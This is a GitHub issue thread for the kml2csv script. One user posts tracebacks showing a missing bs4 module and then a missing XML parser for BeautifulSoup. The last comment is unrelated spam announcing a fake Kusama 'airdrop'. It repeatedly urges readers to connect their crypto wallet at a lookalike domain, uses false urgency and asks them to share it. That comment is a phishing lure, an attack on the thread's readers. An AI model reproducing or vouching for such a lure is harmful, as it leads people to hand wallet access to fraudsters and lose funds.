### ISSUE TITLE
ImportError: No module named bs4

### ISSUE THREAD

**Issue by 79seismo** [justinseibert/kml2csv#1]
python kml2csv.py Vict.kml output.csv
Traceback (most recent call last):
  File "kml2csv.py", line 1, in <module>
    from bs4 import BeautifulSoup
ImportError: No module named bs4

**Comment by 79seismo** [comment]
After installing bs4

python kml2csv.py Vict.kml output.csv
Traceback (most recent call last):
  File "kml2csv.py", line 50, in <module>
    main(inputfile,outputfile)
  File "kml2csv.py", line 39, in main
    kml = BeautifulSoup(f, 'xml')
  File "/usr/local/lib/python2.7/site-packages/bs4/__init__.py", line 216, in __init__
    % ",".join(features))
bs4.FeatureNotFound: Couldn't find a tree builder with the features you requested: xml. Do you need to install a parser library?

**Comment by PolkdotDevelopers** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)
